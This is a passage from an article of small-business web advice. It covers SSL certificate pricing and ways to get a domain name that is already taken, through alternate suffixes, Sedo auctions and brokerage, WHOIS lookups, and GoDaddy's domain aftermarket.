Thawte (thawte.com), also owned by VeriSign, is a little more diverse in its SSL certificate offerings. However, a basic SSL Web Server certificate starts at $249.00 per year and comes with full authentication capable of 256-bit encryption, while the company’s SSL Web Server Certificate with EV starts at $899 per year.
One is to simply alter your domain name, which of course depends on how strongly you feel about the exact form of your proposed domain name. You can often find the domain name you’re looking for with a different suffix like .net, .org, .biz or .info. Or sometimes you can find a .com version of your domain if you change the name slightly.
So if “mybusiness.com” is already taken, you might find that something like “my-business.com” is available. However, using a domain name very similar to an existing one may result in trademark infringement, which could lead to a court order to stop using the name and pay money damages to the other domain name owner.
If you’re adamant about getting the domain name you originally wanted, there are a couple of different options there as well.
Companies like Sedo (sedo.com) and GoDaddy’s The Domain Name Aftermarket (tdnam.com) keep close tabs on the secondary domain market and offer services like domain name auctions and domain brokerage for individuals and businesses that are intent on getting the domain name of their dreams.
Sedo has a Marketplace Auction where many expired or high-demand domain names are placed for auction and sold to the highest bidder. The process is pretty straightforward: an auction runs for a maximum of one week and in the end, the domain is transferred to the new owner through Sedo’s secure escrow service.
The only limitation here is that just because the domain you want is up for grabs, it doesn’t necessarily mean it belongs to Sedo, so you should double check who owns your desired domain name first and then go to the registrar that it is listed under or the location where it is parked. You can easily search for these details through a “WHOIS Lookup” (whois.net).
Sedo also offers a domain brokerage service to help acquire domain names that belong to someone else. Domain professionals conduct extensive research and analysis to provide you with a comprehensive evaluation of the domain’s fair market value and then assist you in determining a reasonable budget to pursue the domain.
Your broker then begins negotiating to secure the domain at the best price while preserving your identity and once there is an agreement of sale, Sedo’s transfer technicians step in to facilitate the domain transfer ensuring security, transparency and a quick change of ownership. You can utilize Sedo’s brokerage service starting at $69.
GoDaddy’s The Domain Name Aftermarket charges a little differently and requires interested domain name sellers and buyers to subscribe for the domain name aftermarket service with an annual fee of $4.99 that enables customers to place bids on expired domain names in a seven-day public auction, backorder domain names so that they’re owned the instant they’re available, as well as make an offer on a domain name and instantly notify the seller, who then has the option of accepting or countering your offer.
One advantage with GoDaddy’s service is that it also offers a 100-Name Domain Monitoring Pack where users can monitor the status of any domain name regardless of the person who registered it or the registrar it belongs to, enabling interested domain buyers to have an overall advantage with all soon-to-expire domain names.